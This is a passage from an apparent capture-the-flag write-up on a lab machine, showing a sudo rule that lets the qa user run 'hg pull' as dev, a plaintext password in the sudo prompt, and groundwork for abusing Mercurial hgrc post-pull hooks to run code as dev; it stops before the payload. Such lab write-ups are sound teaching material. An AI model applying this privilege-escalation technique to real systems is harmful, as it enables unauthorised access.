qa
Checking for sudo privileges of the qa user after making the Lateral Movement
qa@yummy:~$ sudo -l
[sudo] password for qa: jPAd!XQCtn8Oc@2B
Matching Defaults entries for qa on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User qa may run the following commands on localhost:
(dev : dev) /usr/bin/hg pull /home/dev/app-production/The qa user is able to execute /usr/bin/hg pull /home/dev/app-production/ as the dev user
hg
The hg binary is the command-line tool for interacting with Mercurial, a distributed version control system. It allows users to perform various version control operations such as cloning repositories, committing changes, merging branches, and managing file histories. The hg command provides a wide range of features for source code management, enabling efficient collaboration and tracking of changes across projects.
The presence of Mercurial was initially discovered as the QA team appeared to have used it to test out the web application
Reading further into the official documentation, there is a configuration file called, .hg/hgrc, which apparently overrides those in $home/.hgrc
The syntax seems straight forward much like the ini-file format
There is this programmable feature called, [hooks] that can invoke code execution
One of the hooks is post-<command>
It appears that it would be possible to invoke post-pull to work with the sudo privileged-command
Testing
qa@yummy:/tmp$ cat ~/.hgrc
# example user config (see 'hg help config' for more info)
[ui]
# name and email, e.g.
# username = Jane Doe <jdoe@example.com>
username = qa
# We recommend enabling tweakdefaults to get slight improvements to
# the UI over time. Make sure to set HGPLAIN in the environment when
# writing scripts!
# tweakdefaults = True
# uncomment to disable color in command output
# (see 'hg help color' for details)
# color = never
# uncomment to disable command output pagination
# (see 'hg help pager' for details)
# paginate = never
[extensions]
# uncomment the lines below to enable some popular extensions
# (see 'hg help extensions' for more info)
#
# histedit =
# rebase =
# uncommit =
[trusted]
users = qa, dev
groups = qa, devThe current user already has a .hgrc file in the home directory
This appears to be important as it determines the security policy with the [trusted] hook
qa@yummy:/dev/shm$ sudo -u dev /usr/bin/hg pull /home/dev/app-production/
abort: no repository found in '/dev/shm' (.hg not found)Executing the sudo privileged-command alone throws an error that it requires .hg directory
qa@yummy:/dev/shm$ mkdir .hg
qa@yummy:/dev/shm$ sudo -u dev /usr/bin/hg pull /home/dev/app-production/
pulling from /home/dev/app-production/
abort: could not lock working directory of /dev/shm: Permission deniedI created the .hg directory and executed the command again, but it still throws a permission error
qa@yummy:/dev/shm$ chmod 777 .hg
qa@yummy:/dev/shm$ sudo -u dev /usr/bin/hg pull /home/dev/app-production/
pulling from /home/dev/app-production/
requesting all changes
adding changesets
adding manifests
adding file changes
added 6 changesets with 129 changes to 124 files
new changesets f54c91c7fae8:6c59496d5251
(run 'hg update' to get a working copy)Changing the permission bits of the .hg directory allows the sudo privileged-command
qa@yummy:/dev/shm$ ll .hg
total 52
drwxrwxrwx 4 qa qa 280 Oct 7 14:24 ./
drwxrwxrwt 3 root root 60 Oct 7 14:24 ../
-rw-rw-rw- 1 dev dev 1281 Oct 7 14:24 00changelog.d
-rw-rw-rw- 1 dev dev 456 Oct 7 14:24 00changelog.i
-rw-rw-rw- 1 dev dev 4424 Oct 7 14:24 00manifest.d
-rw-rw-rw- 1 dev dev 456 Oct 7 14:24 00manifest.i
-rw-rw-rw- 2 dev dev 8 Oct 7 14:24 branch
drwxrwxrwx 2 dev dev 100 Oct 7 14:24 cache/
drwxrwxrwx 6 dev dev 160 Oct 7 14:24 data/
-rw-rw-rw- 1 dev dev 0 Oct 7 14:24 phaseroots
-rw-rw-rw- 1 dev dev 12450 Oct 7 14:24 undo
-rw-rw-rw- 2 dev dev 8 Oct 7 14:24 undo.backup.branch.bck
-rw-rw-rw- 1 dev dev 55 Oct 7 14:24 undo.backupfiles
-rw-rw-rw- 1 dev dev 39 Oct 7 14:24 undo.descThe .hg directory is populated
Now that I have confirmed the functionality of the sudo privileged-command, I can get to exploiting it with the hgrc file.
Moving on to the Lateral Movement phase